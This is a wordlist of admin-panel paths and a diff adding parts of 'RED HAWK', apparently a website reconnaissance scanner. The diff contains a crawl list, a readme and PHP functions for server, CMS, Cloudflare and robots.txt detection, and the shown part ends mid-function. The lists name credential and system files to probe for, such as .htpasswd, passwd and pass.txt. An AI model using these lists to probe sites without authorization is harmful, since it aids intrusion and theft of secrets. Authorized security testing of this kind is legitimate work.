index.php,panel-administracion/admin.php,modelsearch/index.php,modelsearch/admin.php,admincontrol/login.php,adm/admloginuser.php,admloginuser.php,admin2.php,admin2/login.php,admin2/index.php,usuarios/login.php,adm/index.php,adm.php,affiliate.php,adm_auth.php,memberadmin.php,administratorlogin.php,admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,account.asp,admin/account.asp,admin/index.asp,admin/login.asp,admin/admin.asp,admin_area/admin.asp,admin_area/login.asp,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/admin.html,admin_area/login.html,admin_area/index.html,admin_area/index.asp,bb-admin/index.asp,bb-admin/login.asp,bb-admin/admin.asp,bb-admin/index.html,bb-admin/login.html,bb-admin/admin.html,admin/home.html,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,administrator/index.html,administrator/login.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator.html,moderator/login.html,moderator/admin.html,account.html,controlpanel.html,admincontrol.html,admin_login.html,panel-administracion/login.html,admin/home.asp,admin/controlpanel.asp,admin.asp,pages/admin/admin-login.asp,admin/admin-login.asp,admin-login.asp,admin/cp.asp,cp.asp,administrator/account.asp,administrator.asp,acceso.asp,login.asp,modelsearch/login.asp,moderator.asp,moderator/login.asp,administrator/login.asp,moderator/admin.asp,controlpanel.asp,admin/account.html,adminpanel.html,webadmin.html,pages/admin/admin-login.html,admin/admin-login.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,user.asp,user.html,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/adminLogin.html,adminLogin.html,admin/adminLogin.html,home.html,adminarea/index.html,adminarea/admin.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admin/admin_login.html,admincontrol/login.html,adm/index.html,adm.html,admincontrol.asp,admin/account.asp,adminpanel.asp,webadmin.asp,webadmin/index.asp,webadmin/admin.asp,webadmin/login.asp,admin/admin_login.asp,admin_login.asp,panel-administracion/login.asp,adminLogin.asp,admin/adminLogin.asp,home.asp,admin.asp,adminarea/index.asp,adminarea/admin.asp,adminarea/login.asp,admin-login.html,panel-administracion/index.asp,panel-administracion/admin.asp,modelsearch/index.asp,modelsearch/admin.asp,administrator/index.asp,admincontrol/login.asp,adm/admloginuser.asp,admloginuser.asp,admin2.asp,admin2/login.asp,admin2/index.asp,adm/index.asp,adm.asp,affiliate.asp,adm_auth.asp,memberadmin.asp,administratorlogin.asp,siteadmin/login.asp,siteadmin/index.asp,siteadmin/login.html,admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,usuarios/,usuario/,administrator/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,admin/account.cfm,admin/index.cfm,admin/login.cfm,admin/admin.cfm,admin/account.cfm,admin_area/admin.cfm,admin_area/login.cfm,siteadmin/login.cfm,siteadmin/index.cfm,siteadmin/login.html,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/index.cfm,bb-admin/index.cfm,bb-admin/login.cfm,bb-admin/admin.cfm,admin/home.cfm,admin_area/login.html,admin_area/index.html,admin/controlpanel.cfm,admin.cfm,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/account.html,adminpanel.html,webadmin.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,admin/admin_login.html,admin_login.html,panel-administracion/login.html,admin/cp.cfm,cp.cfm,administrator/index.cfm,administrator/login.cfm,nsw/admin/login.cfm,webadmin/login.cfm,admin/admin_login.cfm,admin_login.cfm,administrator/account.cfm,administrator.cfm,admin_area/admin.html,pages/admin/admin-login.cfm,admin/admin-login.cfm,admin-login.cfm,bb-admin/index.html,bb-admin/login.html,bb-admin/admin.html,admin/home.html,login.cfm,modelsearch/login.cfm,moderator.cfm,moderator/login.cfm,moderator/admin.cfm,account.cfm,pages/admin/admin-login.html,admin/admin-login.html,admin-login.html,controlpanel.cfm,admincontrol.cfm,admin/adminLogin.html,acceso.cfm,adminLogin.html,admin/adminLogin.html,home.html,rcjakar/admin/login.cfm,adminarea/index.html,adminarea/admin.html,webadmin.cfm,webadmin/index.cfm,webadmin/admin.cfm,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,adminpanel.cfm,moderator.html,administrator/index.html,administrator/login.html,user.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator/login.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admincontrol/login.html,adm/index.html,adm.html,moderator/admin.html,user.cfm,account.html,controlpanel.html,admincontrol.html,panel-administracion/login.cfm,wp-login.cfm,adminLogin.cfm,admin/adminLogin.cfm,home.cfm,admin.cfm,adminarea/index.cfm,adminarea/admin.cfm,adminarea/login.cfm,panel-administracion/index.cfm,panel-administracion/admin.cfm,modelsearch/index.cfm,modelsearch/admin.cfm,admincontrol/login.cfm,adm/admloginuser.cfm,admloginuser.cfm,admin2.cfm,admin2/login.cfm,admin2/index.cfm,usuarios/login.cfm,adm/index.cfm,adm.cfm,affiliate.cfm,adm_auth.cfm,memberadmin.cfm,administratorlogin.cfm,admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,usuarios/,usuario/,administrator/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,admin/account.js,admin/index.js,admin/login.js,admin/admin.js,admin/account.js,admin_area/admin.js,admin_area/login.js,siteadmin/login.js,siteadmin/index.js,siteadmin/login.html,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/index.js,bb-admin/index.js,bb-admin/login.js,bb-admin/admin.js,admin/home.js,admin_area/login.html,admin_area/index.html,admin/controlpanel.js,admin.js,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/account.html,adminpanel.html,webadmin.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,admin/admin_login.html,admin_login.html,panel-administracion/login.html,admin/cp.js,cp.js,administrator/index.js,administrator/login.js,nsw/admin/login.js,webadmin/login.js,admin/admin_login.js,admin_login.js,administrator/account.js,administrator.js,admin_area/admin.html,pages/admin/admin-login.js,admin/admin-login.js,admin-login.js,bb-admin/index.html,bb-admin/login.html,bb-admin/admin.html,admin/home.html,login.js,modelsearch/login.js,moderator.js,moderator/login.js,moderator/admin.js,account.js,pages/admin/admin-login.html,admin/admin-login.html,admin-login.html,controlpanel.js,admincontrol.js,admin/adminLogin.html,adminLogin.html,admin/adminLogin.html,home.html,rcjakar/admin/login.js,adminarea/index.html,adminarea/admin.html,webadmin.js,webadmin/index.js,acceso.js,webadmin/admin.js,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,adminpanel.js,moderator.html,administrator/index.html,administrator/login.html,user.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator/login.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admincontrol/login.html,adm/index.html,adm.html,moderator/admin.html,user.js,account.html,controlpanel.html,admincontrol.html,panel-administracion/login.js,wp-login.js,adminLogin.js,admin/adminLogin.js,home.js,admin.js,adminarea/index.js,adminarea/admin.js,adminarea/login.js,panel-administracion/index.js,panel-administracion/admin.js,modelsearch/index.js,modelsearch/admin.js,admincontrol/login.js,adm/admloginuser.js,admloginuser.js,admin2.js,admin2/login.js,admin2/index.js,usuarios/login.js,adm/index.js,adm.js,affiliate.js,adm_auth.js,memberadmin.js,administratorlogin.js,admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,usuarios/,usuario/,administrator/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,admin/account.cgi,admin/index.cgi,admin/login.cgi,admin/admin.cgi,admin/account.cgi,admin_area/admin.cgi,admin_area/login.cgi,siteadmin/login.cgi,siteadmin/index.cgi,siteadmin/login.html,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/index.cgi,bb-admin/index.cgi,bb-admin/login.cgi,bb-admin/admin.cgi,admin/home.cgi,admin_area/login.html,admin_area/index.html,admin/controlpanel.cgi,admin.cgi,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/account.html,adminpanel.html,webadmin.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,admin/admin_login.html,admin_login.html,panel-administracion/login.html,admin/cp.cgi,cp.cgi,administrator/index.cgi,administrator/login.cgi,nsw/admin/login.cgi,webadmin/login.cgi,admin/admin_login.cgi,admin_login.cgi,administrator/account.cgi,administrator.cgi,admin_area/admin.html,pages/admin/admin-login.cgi,admin/admin-login.cgi,admin-login.cgi,bb-admin/index.html,bb-admin/login.html,bb-admin/admin.html,admin/home.html,login.cgi,modelsearch/login.cgi,moderator.cgi,moderator/login.cgi,moderator/admin.cgi,account.cgi,pages/admin/admin-login.html,admin/admin-login.html,admin-login.html,controlpanel.cgi,admincontrol.cgi,admin/adminLogin.html,adminLogin.html,admin/adminLogin.html,home.html,rcjakar/admin/login.cgi,adminarea/index.html,adminarea/admin.html,webadmin.cgi,webadmin/index.cgi,acceso.cgi,webadmin/admin.cgi,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,adminpanel.cgi,moderator.html,administrator/index.html,administrator/login.html,user.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator/login.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admincontrol/login.html,adm/index.html,adm.html,moderator/admin.html,user.cgi,account.html,controlpanel.html,admincontrol.html,panel-administracion/login.cgi,wp-login.cgi,adminLogin.cgi,admin/adminLogin.cgi,home.cgi,admin.cgi,adminarea/index.cgi,adminarea/admin.cgi,adminarea/login.cgi,panel-administracion/index.cgi,panel-administracion/admin.cgi,modelsearch/index.cgi,modelsearch/admin.cgi,admincontrol/login.cgi,adm/admloginuser.cgi,admloginuser.cgi,admin2.cgi,admin2/login.cgi,admin2/index.cgi,usuarios/login.cgi,adm/index.cgi,adm.cgi,affiliate.cgi,adm_auth.cgi,memberadmin.cgi,administratorlogin.cgi,admin/,administrator/,admin1/,admin2/,admin3/,admin4/,admin5/,usuarios/,usuario/,administrator/,moderator/,webadmin/,adminarea/,bb-admin/,adminLogin/,admin_area/,panel-administracion/,instadmin/,memberadmin/,administratorlogin/,adm/,siteadmin/login.html,admin/account.html,admin/index.html,admin/login.html,admin/admin.html,admin_area/login.html,admin_area/index.html,admincp/index.asp,admincp/login.asp,admincp/index.html,admin/account.html,adminpanel.html,webadmin.html,webadmin/index.html,webadmin/admin.html,webadmin/login.html,admin/admin_login.html,admin_login.html,panel-administracion/login.html,admin_area/admin.html,bb-admin/index.html,bb-admin/login.html,bb-admin/admin.html,admin/home.html,pages/admin/admin-login.html,admin/admin-login.html,admin-login.html,admin/adminLogin.html,adminLogin.html,admin/adminLogin.html,home.html,adminarea/index.html,adminarea/admin.html,admin/controlpanel.html,admin.html,admin/cp.html,cp.html,moderator.html,administrator/index.html,administrator/login.html,user.html,administrator/account.html,administrator.html,login.html,modelsearch/login.html,moderator/login.html,adminarea/login.html,panel-administracion/index.html,panel-administracion/admin.html,modelsearch/index.html,modelsearch/admin.html,admincontrol/login.html,adm/index.html,adm.html,moderator/admin.html,account.html,controlpanel.html,admincontrol.html diff --git a/redhawk/crawl/others.ini b/redhawk/crawl/others.ini new file mode 100644 index 0000000..b53c847 --- /dev/null +++ b/redhawk/crawl/others.ini @@ -0,0 +1 @@ +images,css,LC_MESSAGES,js,tmpl,lang,default,README,templates,langs,config,GNUmakefile,themes,en,img,admin,user,plugins,show,level,exec,po,icons,classes,includes,_notes,system,language,MANIFEST,modules,error_log,views,backup,db,lib,faqweb,articleweb,system32,skins,_vti_cnf,models,news,cache,CVS,main,html,faq,update,extensions,jscripts,Packages,languages,features,pix,categoryblog,docs,thumbs,test,php,assets,sp2qfe,data,sp2gdr,include,scripts,helpers,Extension,media,_vti_bin,webalizer,common,logs,search,customer,dialogs,src,cfdocs,INSTALL,winnt,rvtheme_admin,rvtheme,default_admin,default1,LICENSE,Entries,10,treeNav,locale,internals,style,Root,Repository,imapd,flags,defaultColorConf,template,authweb,COPYING,de_DE,english,fr_FR,asp,tmp,sql,source,doc,blocks,backgrounds,maint,help,nl_NL,administrator,version,category,Makefile,styles,toolbar,ra,iissamples,files,PDF,22,catalog,libs,simpletest,database,06,samples,libraries,fc_functions,16,11,fr,bg,01,perl,controllers,12,upload,no_NO,components,class,servlet,de,32,1033,temp,phpunit,info,_vti_pvt,09,utils,fonts,contrib,app,tables,it,editor,demo,wget,ChangeLog,14,03,ru,login,graphics,elements,cfm,bullets,Sources,silver,07,05,dialog,02,xmlrpc,smiley,msadc,mail,connectors,black,backups,GalleryStorage,Auth,04,javascript,install,archive,_private,uploads,table,jqueryui,filemanager,email,dk,cgi,users,sv_SE,index,functions,examples,error,browser,TODO,13,pt_BR,misc,image,com_content,categories,calendar,buttons,404,tools,placeholder,phpmailer,old,moodle2,bin,auth,Adapter,tinymce,msn,links,inc,feed,da_DK,apps,advanced,CREDITS,2010,08,moddata,mod_login,local,ja_JP,forum,fi_FI,drivers,cs_CZ,behaviors,secret,pt_PT,pl_PL,os,office2003,geshi,gallery,flash,conf,caspsamp,application,access,RETAIL,tablecommands,pages,msft,log,fck_template,fck_select,fck_link,fck_image,fck_docprops,fck_about,documents,custom,bbcode,CHANGES,2009,2003,tests,spellerpages,pdf,newsletters,new,library,it_IT,group2,fckeditor,fck_spellerpages,etc,comments,blue,File,CHANGELOG,15,windows,stats,pear,menu,layout,inlinepopups,group7,group6,group5,group4,framework,es,com_contact,blog,aspx,article,0011,0009,zh_TW,xml,postgres,orders,manage,lasso,iisadmpwd,green,forums,file,dtd,downloads,dev,com_weblinks,com_search,check.bat,build,T_IMG,Server,Scripts,LST,IMG,IISADMPWD,HTML,DTL,BNR,60,2011,stories,session,section,refs,print,paste,password,o2k7,mod_search,group8,group3,group1,fullscreen,es_ES,el_GR,download,com_poll,com_newsfeeds,banners,backupdata,autogrow,Promotion,NEWS,DTL_ETC,Client,20,zh_CN,www,stat,smilies,simple,setup,save,rvscompodb,ru_RU,readme,preview,poll,mysql,mod_newsflash,mod_custom,java,i386,home,graphs,frontpage,ext,export,exair,epoch,en_US,domit,core,contact,component,commandclasses,cfusion,analog,actions,_source,UPGRADE,Text,TB_IMG,Storage,Sites,MOB,Images,AUTHORS,ADD_SALE,25,21,00,video,tiny_mce,status,spellchecker,register,private,passwords,oracle,filter,fck_flash,example,editors,directionality,description,content,compat,classic,bbs,_vti_aut,Search,24,23,17,0804,0404,zImage,upgrade,updates,theme,sqlqhit.asp,sk_SK,simplecommands,server,secure,resources,report,py,pub,policy,pagebreak,objects,mod_mainmenu,mod_latestnews,mod_footer,mod_feed,lt_LT,interfaces,i18n,german,ftp,exampleapp,en_GB,contextmenu,configs,com_media,ccbill,branches,Samples,PEAR,OPD,Mail,Knowledge,Filter,Fast_Lane_Checkout,Docs,DLL,0012,0010,0007,yui,xp,weblink,util,ui,tabs,swf,rss,ro_RO,red,payment,nl,music,module,mod_stats,mod_banners,members,layer,khepri,hooks,header,ga_IE,fun,french,extra,element,disk1,dir,devel,com_banners,blogweb,banner,ar,aqua,advlink,advimage,_samples,WORD,MSFT,Image,HEAD,Driver,Decorator,Archive,2008,19,0416,0014,0013,0006,webmail,webcart,tree,tcpdf,support,storage,sl_SI,setting,security,searchreplace,script,schema,safari,rtl,root,plugin,platform,noneditable,mod_poll,mime,meta,magic,linux,kernel,jsp,iespell,hu_HU,hidden,helper,fullpage,format,findreplace,extras,expeval,event,enu,emotions,document,directory,com_user,ca_ES,bugs,beta,base,applets,apache,alpha,advhr,_plugins,_mem_bin,WINDOWS,ViewCode.asp,SpryAssets,Rpc,Release,PBServer,One_Page_Checkout,OEM,News_Management,Manufacturers,MSADC,Gift_Certificates,Extra_Fields,Element,Discount_Coupons,Customer_Reviews,30,27,2004,18,040c,.htpasswd,xhtmlxtras,web,visualchars,utilities,usage,upgrades,uk_UA,testing,store,smarty,setupdir,services,rhuk_milkyway,retail,python,public_html,project,phpMyAdmin,nonbreaking,my_files,mod_syndicate,mod_random_image,lightbox,ko_KR,iso,installer,icon,font,filters,eu_ES,dll,databases,configure,compat2x,clearlooks2,cd,bg_BG,audio,ajax,adapters,about,UPGRADING,ThemeOffice,DRIVERS,ALL,42,2002,000a,.DS_Store,wwwboard,webmaster,weblog,view,tr_TR,thumbnails,themed_graphics,tags,stills,sounds,snippets,simplepie,shipping,sdk,rpc,renderer,popups,photos_history,photo_events,passwd,pass,other,order.log,options,network,netstat,mod,mimetypes,media_index,logfiles,logfile,lang_english,jquery,joomla,imp,id_ID,guests,guestbook,form,filesystems,exchange,easylog,dragresizetable,devices,design,dbg,cssOutsider,cr,cmd.exe,cli,cart,button,bug,bb,autosave,archives,applications,amd64,ads,_sample,WIN98,WIN95,WHATISTHIS,VERSION,SYSTEM,Reader,DatabaseStorage,Cache,31,28,2006,001d,000b,.thumbs,wordpress,win95,win2000,vi,tech,tabfocus,sun,ssi,spam,skin,seminaria,scriptaculous,samba,sam,reset,remotes,remind,projects,prep,phputf8,phpinputfilter,photo,pattemplate,orange,newsfeed,nb_NO,mod_wrapper,mod_breadcrumbs,message,lv_LV,list,ka,ja_purity,insertdatetime,hu,he_IL,guest,general,gd,gcc,foo,filesystem,fi,fck_universalkey,fa_IR,el,datafiles,da,cyber,controls,code,client,ca,brand,backdoor,authadmin,articles,art,arc,af,administration,accounting,account,_vti_adm,OpenID,NIF,Latest,ImageManager,CSS,Block,All,Action,9x,29,2007,2005,1.2,001e,zip,wwwstat,wwwlog,wstats,wsdocs,white,webstats,webstat,webmaster_logs,weblogs,vivid_dreams,vax,userdb,tr,technote,sun2,sshots,sparc,siteadmin,shtml.dll,showcode.asp,shark,shared,secrets,sales,s5,releases,registry,rating,publish,public,protected,pl,pics,phpxmlrpc,phpgacl,pass.txt,par2,papers,overrides,orders.txt,openid,oordir,oldfiles,old_files,nuke,no,nn_NO,my_pictures,my_documents,ms,monitor,mod_whosonline,mod_sections,mod_related_items,mod_mostread,mnet,mk,memberfiles,language_files,jscalendar,issamples,index.cgi,index.cfm,import,idn,htdocs,htbin,headers,globals,fashion_mosaic,fa,expelval,et_EE,et,dtree,dos,dcforum,customers,css_styles,com_mailto,clientes,cliente,cgiwin,cgishl,cgiscripts,cgiscript,cgis,cgilib,cgibin,cgi_local,cgi_bin,cfide,cfapps,cc,cats,boxes,boot,bn,bitfolge,billing,beez,bank,backend,alex,albums,agentes,adsamples,adpassword.txt,admisapi,adminweb,adminuser,administracion,adminfiles,admcgi,adm,addons,ad,active.log,access.txt,access.log,_testcases,Zend,Yadis,Xtras,XML,Util,Templates,SQLQHit.asp,SETUPDIR,Response,Resource,Request,Renderer,RTE_configuration,Plugin,Net,Membership,Media,M_images,MNU_blank_data,Http,Helper,Function,FCKeditor,80,26,yacs,wp,word,wood,vb,v2,us,uk,ug,tiger,thumb,tex,test2,test1,templates_c,tag,tab,sys,sv,super,stars,sphinx,sparc64,social,sm,slider,site,singer,shop,settings,service,servers,selector,rvslib,rvsincludefile,ro,reports,ready,pt,prefs,posters,ports,pop,polls,phpInputFilter,pdf_fonts,pcl,patTemplate,packages,output,notes,networks,native,mp3,mod_archive,mobile,messages,mcpuk,mbstring,math,manual,live,legacy,leaflet,ja,item,ideas,hw,h_teal,h_green,h_cherry,global,gl,fy,fsbb,forms,fax,external,ethernet,es_AR,equipment,environment,engines,eg,edit,diagon,copy_this,com_wrapper,codes,cert,centosplus,captcha,books,big,be,background,avatars,authentication,asms,archive_tar,amiga,ads_data,adodb,acrobat,Win9x,Win98,Win2k,WebShop,WINME,VER_sel_data,SYMBOLS,ReleaseNotes,RELEASE_NOTES,Query,Provider,MNU_top_data,MNU_menu_data,Linux,LICENCE,HTTP,Form,Commands,Changelog,AMD64bit,46,37,1.4,1.3,zoom,zinfandel,zen,yoda,xstandard,xsql,xinu,x86_64,wysiwyg,wwwstats,work,wombat,wlw,win.ini,vms,vlsi,virus,vector,user2,user1,ur,unix,trac,topics,tolkien,tl,tinman,ti,th,te,ta,symbols,sun3,sulu,steps,status.php3,standart,standards,staff,ssl,sr_YU,sr,sql.php3,sponsors,spock,spiffyCal,spiff,spanish,sneezy,smiles,slideshow,slices,sl,sk,si,shtml.exe,shrdlu,share,sh,sequent,sei,sanfran,rti,rte,ronin,riacs,remote,question,pw,ptj,ps,protector,proftpd,profile,printer,portal,pm,piranha,pic,phpnuke,phpBB2,perso,perf,pegasus,pds,pcat,payments,parts,pagers,outlaw,original,orca,official,number,nt4,newsletter,net,my,multianswer,mtxinu,mr,mod_quickicon,mms,ml,mips,maui,matrix,marlboro,mainsail,main.cgi,lover,logsaccess_log,link,leo,lehi3b15,laurent,labs,la,klingon,kilroy,jellystone,isos,internet,iis,idea,ibmpc,ht,hr,hp,howitworks,hi,heads,he,hardware,gu,groups,gq,gonzo,gold,gnome,gb,gandalf,ga,fruit,foobar,files.pl,fasttrack,excalibur,events,etaoin,elephant,einstein,eecs,eb,easton,dvd,dv,dopey,domcfg.nsf,documentation,dm,dl,dists,dist,demos,dbi,darkblue_orange,cy_GB,cy,cube,csr,csee,cs,course,cosmos,cosmic,cookie,convex,commerce,com_messages,com_menus,com_massmail,com_login,com_languages,com_installer,com_frontpage,com_cpanel,com_config,com_checkin,com_categories,com_cache,com_admin,com,codebrws.asp,cm,cls,cic,catalog_type.asp,cat,caliban,caip,c6,c5,c4,c3,c2,bugsbunny,bs,boeing,bloomcounty,block,bd,bc,batcomputer,bar,ba,b9,b8,b7,b6,b4,b3,b2,b1,b0,aw,audubon,atc,async,ast,arm,apl,ans,am,afp,ae,admentor,ab,aardvark,aa,a9,a8,a7,a5,a4,a3,a2,a1,_vti_log,_themes,_packager,Writer,WINXP,WIN2000,View,SYMBOLS.PRI,Photos,Pear,PDG_Cart,Message,Log,INF,HISTORY,Flash,Feed,Entry,Dos,Disk1,Data,DOS,Classes,Builder,Books,App,Administrator,70,69,68,67,62,61,54,52,50,41,35,33,2009_Q4,0816,011,0019,xv,wsc,wpThumbnails,winxp,winnt40,winnt351,win9x,wifi,wei,waves,voice,vm,vim,videos,url,unknown,um,tulip,trw,translate,transformations,top,tmc,thunderbird,theory,tesseract,terminal,talk,tac,sysadmin,swift,survey,suphp,supercache,sub,stylesheets,studio,structure,ss,squirrelspell,spool,spice,speech,spamcop,solaris,software,soap,snapshots,silk,sierra,shans9,shans8,shans7,shans6,shans5,shans4,shans3,shans2,shans10,shans1,sentinel,sent_subfolders,sensor,seit,scr,scm,sample,s3,rvs_library,ruby,rpm,rouge,roskilde,rock,reviews,resource,research,relnotes,recruit,recaptcha,reading,raw,rav,psd,prime,pre,portlet,popup,pictures,picasa,phpmyadmin,phototheque,photos,phoenix,persian,pdb,parameter,panel,packaging,oxford,os2,odbc,ocean,nwclient,nss,note,nlm,nif,nic,next,newmail,mutt,msql,msi,mp,mosaic,module1,mods,modifier,mod_unread,mod_toolbar,mod_title,mod_submenu,mod_status,mod_popular,mod_online,mod_menu,mod_logged,mod_latest,mn,microsoft,message_details,mercury,menus,martin,marlin,maps,mango,manager,mailto,mailman,mail_fetch,mag,mac,lv,luna,lucid,lori,logos,listcommands,lighter,light,libImaging,lg_lexique,layouts,lang_french,kodak,km,jscript,jerome,jenkins,jazz,is_IS,intranet,ingres,infos,images_small,id,ias,husky,hl,highslide,hf,head,hardy,handler,gwen,gs,group,gross,gr,gift,getpot,geo,generic,gateway,gap,gallery2,galaxy,fusion,function,ft,freeradius,frames,fortune,food,folders,flex,fj,fixtures,ff,fe,fd,fc,fb,f2,f1,experimental,exclude,europe,eunomia,eu,espanol,enrol,ems,emerald,eigen,ef,ee,ed,eco,ec,ea,e4,e3,e2,e1,e0,dsl,development,delete_move_next,dc,davinci,d9,d8,d7,d6,d5,d4,d3,d2,d1,d0,cz,custombuild,cp,counter,count,control,conn,comment,comctl,com_users,com_trash,com_templates,com_sections,com_plugins,com_modules,cogito,cobalt,cn,cj,circe,ci,chs,chips,chimera,chat,changelog,cf,ce,cdrom,cck,cb,c9,c8,c7,c1,c0,bulkquery,bug_report,bsd,brown,bridge,brick,br,bluewhite,bio,bf,ben,bckgnd,bard,back,b5,awstats,avatar,attachments,atari,at,asd,apt,apple,ams,amadeus,alt,alley,algor,aiken,adobeair,adara,ac,abc,a6,_vti_txt,_fpclass,YouTube,WINNT,Tools,TemplateCache,Tag,TEMPLATE,Strategy,Stat,Spreadsheets,Sitemap,Services,SP2QFE,SETUP,RAID,Pdo,Pager,PRIVACY,OutputFilter,NLS,Mysqli,Music,Modifier,Math,MS,MIME,Logs,Language,Kind,KOR,JPN,InputFilter,Health,HELP,HEADER.images,Geo,Gdata,Gbase,Gapps,Font,FAQ,Exif,Dump,DublinCore,Documents,Default,Db,Date,DISK1,Container,Console,Common,Captcha,Calendar,CRYPTO,COMMON,CHT,CHS,CAPTCHA,Admin,AOL,8.2,8.1,72,71,66,65,64,63,59,58,57,56,55,53,51,49,48,47,45,43,40,39,38,36,2009_Q3,2009_Q2,2009_Q1,2001,2.2,1999,1998,1997,1996,1995,1984,1000,.smileys,.cvsignore,0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z diff --git a/redhawk/crawl/readme.txt b/redhawk/crawl/readme.txt new file mode 100644 index 0000000..bbe09db --- /dev/null +++ b/redhawk/crawl/readme.txt @@ -0,0 +1,23 @@ +This is a Part of RED HAWK + +[ D E S C R I P T I O N ] + +This directory contains mainly 4 files namely + +- admin.ini +- backup.ini +- others.ini +- readme.txt + +The first three files are mendetory for the RED HAWK scanner. These files have the list of files and directories which the scanner uses for crawling. + +[ U S A G E & W A R N I N G S ] + +• You can edit these files to put your own customized list. + +• The 3 different ini files have list of different kinds of files and directories. + - admin.ini : contains a list of admin pages or admin directories. + - backup.ini : contains a list of commonly known backup files. + - others.ini : basically all the other lists. + +• Please NOTE the lists are separeted by COMMA "," any other type of separation used will cause error while crawling. diff --git a/redhawk/functions.php b/redhawk/functions.php new file mode 100644 index 0000000..d080fd4 --- /dev/null +++ b/redhawk/functions.php @@ -0,0 +1,358 @@ +]*>(.*?)<\/title>/ims', $data, $matches) ? $matches[1] : null; + return $title; + } + function userinput($message){ + global $white, $bold, $greenbg, $redbg, $bluebg, $cln, $lblue, $fgreen; + $yellowbg = "\e[100m"; + $inputstyle = $cln . $bold . $lblue . "[#] " . $message . ": " . $fgreen ; + echo $inputstyle; + } +function WEBserver($urlws){ + stream_context_set_default( [ + 'ssl' => [ + 'verify_peer' => false, + 'verify_peer_name' => false, + ], +]); + $wsheaders = get_headers($urlws, 1); + if (is_array($wsheaders['Server'])) { $ws = $wsheaders['Server'][0];}else{ + $ws = $wsheaders['Server']; + } + if ($ws == "") + { + echo "\e[91mCould Not Detect\e[0m"; + } + else + { + echo "\e[92m$ws \e[0m"; + } +} + + +function cloudflaredetect($reallink){ + + $urlhh = "http://api.hackertarget.com/httpheaders/?q=" . $reallink; + $resulthh = file_get_contents($urlhh); + if (strpos($resulthh, 'cloudflare') !== false) + { + echo "\e[91mDetected\n\e[0m"; + } + else + { + echo "\e[92mNot Detected\n\e[0m"; + } +} + + +function CMSdetect($reallink){ + $cmssc = readcontents($reallink); + if (strpos($cmssc, '/wp-content/') !== false) + { + $tcms = "WordPress"; + + } + else + { + if (strpos($cmssc, 'Joomla') !== false) + { + $tcms = "Joomla"; + } + else + { + $drpurl = $reallink . "/misc/drupal.js"; + $drpsc = readcontents("$drpurl"); + if (strpos($drpsc, 'Drupal') !== false) + { + $tcms = "Drupal"; + } + else + { + if (strpos($cmssc, '/skin/frontend/') !== false) + { + $tcms = "Magento"; + } + else + { + if (strpos($cmssc, 'content="WordPress')!== false) { + $tcms = "WordPress"; + } + else { + + + $tcms = "\e[91mCould Not Detect"; + } + } + } + } + } + return $tcms; +} +function robotsdottxt($reallink){ + $rbturl = $reallink . "/robots.txt"; + $rbthandle = curl_init($rbturl); + curl_setopt($rbthandle, CURLOPT_SSL_VERIFYPEER, false); + curl_setopt($rbthandle, CURLOPT_RETURNTRANSFER, TRUE); + $rbtresponse = curl_exec($rbthandle); + $rbthttpCode = curl_getinfo($rbthandle, CURLINFO_HTTP_CODE); + if ($rbthttpCode == 200) + { + $rbtcontent = readcontents($rbturl); + if ($rbtcontent == "") + { + echo "Found But Empty!"; + } + else + { + echo "\e[92mFound \e[0m\n"; + echo "\e[36m\n-------------[ contents ]---------------- \e[0m\n"; + echo $rbtcontent; + echo "\e[36m\n-----------[end of contents]-------------\e[0m"; + } + } + else + { + echo "\e[91mCould NOT Find robots.txt! \e[0m\n"; + } +} +function gethttpheader($reallink){ + $hdr = get_headers($reallink); + foreach ($hdr as $shdr) { + echo "\n\e[92m\e[1m[i]\e[0m $shdr"; + } + echo "\n"; + +} +function extract_social_links($sourcecode){ + /* This is really a simple code for now i will work around it on the upcoming version. + For now only these social media are supported: + - Facebook + - Twitter + - Instagram + - YouTube + - Google + + - Pinterest + - GitHUB + */ + global $bold, $lblue, $fgreen, $red, $blue, $magenta, $orange, $white, $green, $grey, $cyan; + $fb_link_count = 0; + $twitter_link_count = 0; + $insta_link_count = 0; + $yt_link_count = 0; + $gp_link_count = 0; + $pint_link_count = 0; + $github_link_count = 0; + $total_social_link_count = 0; + + 